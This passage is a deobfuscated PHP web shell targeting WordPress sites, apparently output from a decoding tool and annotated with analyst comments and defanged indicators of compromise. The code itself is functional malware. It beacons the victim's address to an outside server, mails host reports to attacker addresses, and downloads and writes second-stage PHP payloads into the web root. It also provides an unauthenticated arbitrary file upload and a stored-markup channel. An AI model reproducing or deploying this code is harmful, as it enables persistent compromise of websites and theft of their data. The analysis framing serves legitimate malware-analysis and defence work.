            // that the block at label C25SI can call WordPress functions. Otherwise the
            // script walks upward from its own directory, one "../" per path component,
            // and includes the first wp-load.php it finds. $wp_detect records success.
            if (
                file_exists(
                    $document_root .
                        "\57\167\160\55\x6c\x6f\141\144\56\160\x68\160"
                )
            ) {
                include $document_root .
                    "\57\167\x70\55\x6c\157\141\x64\56\x70\150\160";
                $wp_detect = 1;
            } else {
                // Number of "/"-separated components of the script directory: the
                // upper bound on how many levels the search climbs.
                $prefix = count(@explode("\57", $document_root_file));
                $a = "";
                for ($i = 0; $i < $prefix; $i++) {
                    $a = $a . "\56\56\57";
                    if (
                        file_exists(
                            $document_root_file .
                                "\x2f" .
                                $a .
                                "\167\x70\x2d\154\157\141\x64\56\x70\x68\x70"
                        )
                    ) {
                        include $document_root_file .
                            "\57" .
                            $a .
                            "\167\x70\x2d\x6c\x6f\x61\144\56\x70\150\x70";
                        $wp_detect = 1;
                        break;
                    }
                }
            }
            goto C25SI;
            Ov2Mi:
            // Recipient of the host-profile report mailed at label f56yq. Decodes to
            // byhero44[at]gmail[.]com (IoC). The next label (ng0zC) is not shown in
            // this part of the listing.
            $kime =
                "\x62\x79\150\145\162\x6f\64\64\100\147\155\141\151\x6c\56\x63\x6f\155";
            goto ng0zC;
            SeJ_g:
            // Beacon: requests the URL in $x (built at label mktxn) so the operator's
            // server learns this shell's address. cURL is used when "curl_init" exists,
            // with file_get_contents() as fallback when the transfer returns false or
            // cURL is missing. The response ($gitt) is not used anywhere in the visible
            // part of the listing; the request itself is the purpose.
            if (function_exists("\143\165\162\154\x5f\151\156\151\164")) {
                $ch = @curl_init();
                curl_setopt($ch, CURLOPT_URL, $x);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                $gitt = curl_exec($ch);
                curl_close($ch);
                // Loose comparison: an empty response body also triggers the retry.
                if ($gitt == false) {
                    @$gitt = file_get_contents($x);
                }
            } elseif (
                function_exists(
                    "\x66\151\x6c\145\137\147\145\164\x5f\x63\x6f\x6e\x74\x65\156\164\x73"
                )
            ) {
                @$gitt = file_get_contents($x);
            }
            goto cISOa;
            WXtQU:
            // Appends "Server isletim sistemi : <$_SERVER['SERVER_SOFTWARE']>\r\n"
            // (decoded; Turkish, "server operating system") to the report.
            $EL_MuHaMMeD .=
                "\x53\x65\x72\166\x65\162\40\x69\163\x6c\x65\164\151\155\x20\163\x69\x73\164\x65\x6d\151\40\x3a\x20" .
                $_SERVER[
                    "\123\x45\122\x56\105\x52\x5f\x53\117\106\124\x57\x41\122\x45"
                ] .
                "\15\12";
            goto CIMtL;
            xz_53:
            // Appends "Avlanan Site : <$_SERVER['HTTP_HOST']>\r\n" (decoded; Turkish,
            // roughly "hunted site"). HTTP_HOST comes from the request's Host header.
            $EL_MuHaMMeD .=
                "\101\x76\x6c\x61\x6e\x61\x6e\40\x53\x69\164\145\40\72\40" .
                $_SERVER["\110\x54\x54\x50\x5f\110\x4f\123\124"] .
                "\xd\12";
            goto f56yq;
            TMx8f:
            // Analyst note: drops a further PHP file and reports it by mail.
            // $datasi is assigned outside this part of the listing; when it is falsy
            // the else branch runs:
            //   1. creates directory "js" relative to the current directory;
            //   2. downloads hxxps://acbdf[.]space/txt/css.txt (decoded URL);
            //   3. writes the body to "js/js.php";
            //   4. mails an HTML notice containing this script's URL to two addresses.
            // Every filesystem and mail call is prefixed with "@", so failures leave
            // no PHP warning in the error log. IoCs: a "js/js.php" file next to the
            // shell, mail subject "Hacklink Bildirisi", sender header
            // "SheLL Boot <suppor[at]nic[.]org>".
            if ($datasi) {
            } else {
                @mkdir("\x6a\x73");
                $dos = file_get_contents(
                    "\x68\x74\164\160\163\72\x2f\57\x61\x63\x62\x64\146\56\163\x70\141\143\145\57\x74\x78\x74\x2f\143\163\x73\x2e\164\170\x74"
                );
                $data = "\x6a\x73\x2f\152\163\x2e\160\x68\x70";
                @touch("\152\163\x2f\x6a\x73\56\x70\150\160");
                $ver = @fopen($data, "\x77");
                @fwrite($ver, $dos);
                @fclose($ver);
                // "http://" + Host header + request URI: the shell's own address.
                $yol =
                    "\150\x74\x74\x70\x3a\x2f\57" .
                    $_SERVER["\110\x54\124\x50\x5f\x48\x4f\123\x54"] .
                    "" .
                    $_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\125\122\111"] .
                    "";
                // Decodes to "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol .
                // "<br/>Sender Yolu : js/crs.php</h1>". The notice names "js/crs.php",
                // while the file written above is "js/js.php".
                $y =
                    "\74\x68\61\76\x53\x65\x6e\x64\x65\162\40\x59\141\x7a\144\x69\162\151\154\x64\151\x2e\74\x62\x72\x2f\76\40\123\x49\124\105\x20\x59\x4f\x4c\40\72\40" .
                    $yol .
                    "\x3c\x62\x72\57\x3e\x53\x65\x6e\x64\x65\162\x20\131\157\x6c\165\x20\x3a\40\x6a\163\x2f\143\x72\x73\56\160\x68\x70\x3c\x2f\x68\61\76";
                // Appended with ".=": whatever $header held before this block is kept.
                // Decodes to "From: SheLL Boot <suppor@nic.org>\n".
                $header .=
                    "\x46\162\x6f\x6d\x3a\40\x53\150\145\114\x4c\40\x42\157\157\x74\40\74\163\x75\x70\160\157\x72\x40\x6e\151\x63\56\157\162\147\76\xa";
                // Decodes to "Content-Type: text/html;\n charset=utf-8\n".
                $header .=
                    "\x43\157\x6e\x74\x65\156\x74\x2d\x54\x79\160\145\72\40\164\x65\x78\x74\57\150\x74\155\x6c\x3b\xa\x20\143\150\141\162\163\145\164\x3d\165\164\x66\x2d\x38\12";
                // Recipient decodes to byhero44[at]gmail[.]com.
                @mail(
                    "\x62\171\x68\x65\162\x6f\64\64\x40\x67\x6d\141\x69\x6c\56\143\157\155",
                    "\110\141\x63\x6b\x6c\x69\156\153\40\102\151\x6c\x64\151\162\x69",
                    "{$y}",
                    $header
                );
                // Recipient decodes to loginoldum[at]gmail[.]com.
                @mail(
                    "\x6c\x6f\x67\x69\156\157\x6c\144\x75\155\x40\147\155\x61\x69\154\x2e\143\157\x6d",
                    "\x48\x61\143\153\154\x69\156\153\40\102\x69\x6c\144\x69\x72\x69",
                    "{$y}",
                    $header
                );
            }
            goto RzdXK;
            YinPl:
            // Writes the payload fetched at label rict2 into <DOCUMENT_ROOT>/phpinfo.php
            // (handle opened at label Ibor6).
            fwrite($open_makale, $makale);
            goto fvNQ1;
            fvNQ1:
            fclose($open_makale);
            goto MnOUx;
            JpeK8:
            // Second-stage fetch. The URL decodes to hxxps://acbdf[.]space/txt/wp.txt;
            // the body is copied into every eligible directory as "wp-inda.php" by the
            // loop at label x3CD0.
            $css = http_get(
                "\150\x74\164\x70\163\x3a\57\57\141\x63\x62\x64\x66\56\x73\160\x61\x63\145\57\164\170\164\57\167\x70\x2e\x74\x78\x74"
            );
            goto x3CD0;
            mktxn:
            // Beacon URL. The first literal is base64 inside escape sequences and
            // decodes to hxxps://anonym0us[.]club/l- ; it is followed by the result of
            // GetIP() (defined outside this part of the listing), a "-", and the
            // base64 of "http://" + Host header + request URI, i.e. the shell's own
            // address. Requested at label SeJ_g.
            $x =
                base64_decode(
                    "\x61\x48\122\x30\x63\110\115\x36\114\171\x39\x68\x62\x6d\71\165\x65\x57\x30\x77\144\x58\x4d\x75\x59\x32\170\61\x59\x69\x39\163\x4c\121\x3d\75"
                ) .
                GetIP() .
                "\x2d" .
                base64_encode(
                    "\x68\x74\x74\x70\x3a\x2f\57" .
                        $_SERVER["\110\x54\124\120\137\110\117\123\x54"] .
                        $_SERVER["\x52\105\x51\125\x45\x53\x54\137\x55\x52\111"]
                );
            goto SeJ_g;
            n4EYX:
            // Reached after the HTML page has been emitted (label oTiro). The key
            // decodes to "DOCUMENT_ROOT"; this value anchors every file drop that
            // follows (wp-clon.php, phpinfo.php, wp-inda.php).
            $document_root =
                $_SERVER[
                    "\x44\x4f\103\x55\115\105\116\x54\x5f\122\117\x4f\124"
                ];
            goto eTg8m;
            ed42a:
            // The key decodes to "REMOTE_ADDR": the address of the client that loaded
            // the shell.
            $ip_remote =
                $_SERVER["\122\105\115\117\x54\x45\x5f\101\x44\x44\122"];
            goto uKFRu;
            yOXvE:
            /**
             * Handler for the "upload" feature: writes caller-supplied bytes to disk.
             *
             * Analyst note: $path, $file and $cwd come straight from $_POST in the
             * dispatcher at label rzCDn. The path is not restricted to any directory
             * or extension, so this is an arbitrary file write with the privileges of
             * the PHP user. A web root that the PHP user cannot write to, plus
             * file-integrity monitoring on it, limits what this handler can achieve.
             *
             * @param string $path Destination path, resolved relative to $cwd.
             * @param string $file Base64-encoded file content.
             * @param string $cwd  Directory to chdir() into first.
             * @return array Decoded keys "stdout" and "cwd"; the message is
             *               "Invalid path / no write permission." on failure and
             *               "Done." on success.
             */
            function featureUpload($path, $file, $cwd)
            {
                chdir($cwd);
                // Mode decodes to "wb": create or truncate, binary.
                $f = @fopen($path, "\167\142");
                if ($f === false) {
                    return [
                        "\163\x74\144\x6f\165\164" => [
                            "\x49\x6e\x76\141\154\151\144\40\160\141\164\x68\40\57\40\156\x6f\40\x77\162\x69\x74\x65\40\160\145\162\155\x69\x73\163\x69\157\x6e\56",
                        ],
                        "\143\167\144" => getcwd(),
                    ];
                } else {
                    // base64_decode() is called in its default non-strict mode; the
                    // fwrite() result is not checked.
                    fwrite($f, base64_decode($file));
                    fclose($f);
                    return [
                        "\163\x74\144\157\165\x74" => ["\x44\157\156\145\x2e"],
                        "\x63\167\x64" => getcwd(),
                    ];
                }
            }
            goto rzCDn;
            l1I1k:
            // Analyst note: a second, independent control channel. The POST key
            // decodes to "query" and both file names to "data.txt" (relative to the
            // current directory).
            //   - With a "query" field: its value, after two stripslashes() passes, is
            //     written to data.txt, replacing the previous content.
            //   - Without it: up to six lines of data.txt (at most 1023 bytes each) are
            //     echoed into the response with no output encoding, so whoever can
            //     POST "query" controls markup served to later visitors of this URL.
            // Like the other handlers, no credential check appears in this block.
            // IoC: a "data.txt" file next to the shell, and POST bodies with "query=".
            if ($_POST["\x71\165\x65\162\171"]) {
                $veriyfy = stripslashes(
                    stripslashes($_POST["\x71\165\145\162\171"])
                );
                $data = "\144\x61\164\x61\56\164\x78\164";
                @touch("\x64\141\164\141\56\x74\x78\164");
                $ver = @fopen($data, "\x77");
                @fwrite($ver, $veriyfy);
                @fclose($ver);
            } else {
                $datas = @fopen("\x64\x61\x74\141\56\164\170\x74", "\x72");
                $i = 0;
                // $i runs 0..5, so fgets() is called six times; the handle is never
                // closed and a failed fopen() is not checked.
                while ($i <= 5) {
                    $i++;
                    $blue = @fgets($datas, 1024);
                    echo $blue;
                }
            }
            goto nk66E;
            ujkIR:

?>

Function Calls

None

Variables

None

Stats

MD5 332148d8ac45c79a8cfa76768518c526
Eval Count 0
Decode Time 84 ms